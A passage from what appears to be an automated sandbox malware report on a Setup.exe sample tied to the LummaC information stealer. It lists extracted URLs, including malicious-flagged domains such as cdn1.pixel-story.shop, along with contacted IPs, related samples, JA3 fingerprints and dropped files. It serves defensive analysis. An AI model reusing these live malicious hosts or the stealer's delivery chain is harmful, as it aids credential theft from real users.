                                                                                                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.0000000001856000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://steam.tv/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://sliperyedhby.icu/V1msiexec.exe, 00000005.00000003.1343033504.000000000659B000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1372276141.000000000659B000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1357561390.0000000006598000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1341592315.0000000006598000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_medium.jpgInstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.0000000001858000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=englishhInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&amp;InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://store.steampowered.com/responsive_page_content_overlayhttps://store.steampowered.com/LinkInstallUtil.exe, 0000000F.00000002.2492246626.00000000018A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.microsoft;InstallUtil.exe, 0000000F.00000002.2490650779.000000000102D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishInstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/images/apps/34830/c9e6a4910e1d7e40e62ab3791InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://store.steampowered.com/privacy_agreement/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://store.steampowered.com/points/shop/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://store.steampowered.com/subscriber_agreement/http://store.steampowered.com/account/cookieprefeInstallUtil.exe, 0000000F.00000002.2492246626.000000000180E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&amp;l=englInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://steamcommunity.com/profiles/76561198043764602/badges/InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=englishInstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/my/wishlist/https://store.steampowered.com/points/shop/https://store.steaInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.autoitscript.com/autoit3/X7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1603850920.00000000098D9000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000000.1561712933.0000000000915000.00000002.00000001.01000000.0000000A.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drfalse
                                                                                                                                      		high
                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&amp;l=enInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtdtls:7LUEA3.pif, 0000000C.00000003.1620448866.0000000009D30000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1630485888.0000000009320000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1673281933.0000000006590000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 0000000F.00000002.2451954352.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sketchfab.comInstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.ecosia.org/newtab/msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.symauth.com/cps0(Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://lv.queniujq.cnInstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=akmtVhyxSS8B&amp;l=eInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brmsiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.youtube.com/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=BqN7WqGLHNiU&lInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://store.steampowered.com/privacy_agreement/InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://cdn.fastly.steamstatic.com/steamcommunity/public/images/apps/34830/98fd6d79ce619a30152b86e08InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/profiles/76561198043764602/games/InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://cdn1.pixel-story.shop/clp_pa.32nmsiexec.exe, 00000005.00000003.1582101958.0000000003568000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.0000000003570000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=englisInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=akmtVhyxSS8B&l=engliInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/app/34830InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://www.symauth.com/rpa00Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/profiles/76561198043764602/badges/1InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamcommunity.com/profiles/76561198043764602/games/?tab=allInstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.google.com/recaptcha/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://checkout.steampowered.com/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://www.info-zip.org/Setup.exe, 00000000.00000002.1211394304.000000000460E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.000000000558F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://steamcommunity.com/profiles/76561198257089751InstallUtil.exe, 0000000F.00000002.2492246626.0000000001970000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.000000000190C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&amp;l=englishInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://store.steampowered.com/;InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/about/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://steamcommunity.com/my/wishlist/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&ampInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&l=InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://help.steampowered.com/en/InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          62.60.234.80
                                                                                                                                                                                                          		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                          		18013ASLINE-AS-APASLINELIMITEDHKfalse
                                                                                                                                                                                                          104.102.49.254
                                                                                                                                                                                                          		steamcommunity.comUnited States
                                                                                                                                                                                                          		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                          172.67.131.254
                                                                                                                                                                                                          		sliperyedhby.icuUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                          172.67.185.54
                                                                                                                                                                                                          		cdn1.pixel-story.shopUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                          Analysis ID:1557280
                                                                                                                                                                                                          Start date and time:2024-11-18 00:14:40 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 8m 10s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:18
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:Setup.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@14/8@3/4
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 95%
                                                                                                                                                                                                          • Number of executed functions: 70
                                                                                                                                                                                                          • Number of non-executed functions: 188
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Execution Graph export aborted for target InstallUtil.exe, PID 2852 because there are no executed function
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: Setup.exe

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          18:15:13API Interceptor1x Sleep call for process: Setup.exe modified
                                                                                                                                                                                                          18:15:22API Interceptor14x Sleep call for process: msiexec.exe modified

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          z5dejE5wp9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          JaDheaBFXI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          OD5lecPHBl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          cdn1.pixel-story.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.21.32.85
                                                                                                                                                                                                          CVMrdORGbI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.21.32.85
                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                          • 104.21.32.85
                                                                                                                                                                                                          OtherBahamas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.21.32.85
                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                          • 104.21.32.85
                                                                                                                                                                                                          KfoiTvEwmD.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                          • 104.21.32.85

                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          CLOUDFLARENETUSSsc Executed Docs#962297(Revised).docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          F8TXbAdG3G.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          Echelon.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.21.19.213
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          iDvmIRCPBw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.21.74.130
                                                                                                                                                                                                          SolPen.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                          • 172.67.128.233
                                                                                                                                                                                                          ZdXUGLQpoL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.21.74.130
                                                                                                                                                                                                          ASLINE-AS-APASLINELIMITEDHKhttp://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 107.148.147.155
                                                                                                                                                                                                          ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                          • 107.148.160.131
                                                                                                                                                                                                          6G1YhrEmQu.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                          • 62.60.217.17
                                                                                                                                                                                                          8WdO7I87E1.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                          • 156.241.211.234
                                                                                                                                                                                                          2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 107.148.177.200
                                                                                                                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                          • 62.60.190.120
                                                                                                                                                                                                          belks.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 62.60.227.67
                                                                                                                                                                                                          Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 107.148.177.200
                                                                                                                                                                                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                          • 107.148.199.21
                                                                                                                                                                                                          la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 213.176.94.234
                                                                                                                                                                                                          AKAMAI-ASUSfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                          • 23.47.50.167
                                                                                                                                                                                                          x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 23.40.23.244
                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, StealcBrowse
                                                                                                                                                                                                          • 23.47.50.151
                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                          • 23.47.50.145
                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                          • 23.47.50.145
                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                          • 184.25.237.152
                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                          • 23.47.50.41
                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                          • 23.47.50.146
                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                          • 23.47.50.143
                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                          • 23.38.189.114

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          Echelon.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          SolPen.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          SolPen.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 172.67.185.54
                                                                                                                                                                                                          • 172.67.131.254

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\7LUEA3.pifSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                    drivers-v1.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      getsetup3rd.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        paracms.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          getup.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            https://zip-store.oss-ap-southeast-1.aliyuncs.com/updated%20file/paracms.txtGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\cbaxoydi

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):304640
                                                                                                                                                                                                                              Entropy (8bit):6.821877812702892
                                                                                                                                                                                                                              Encrypted:false
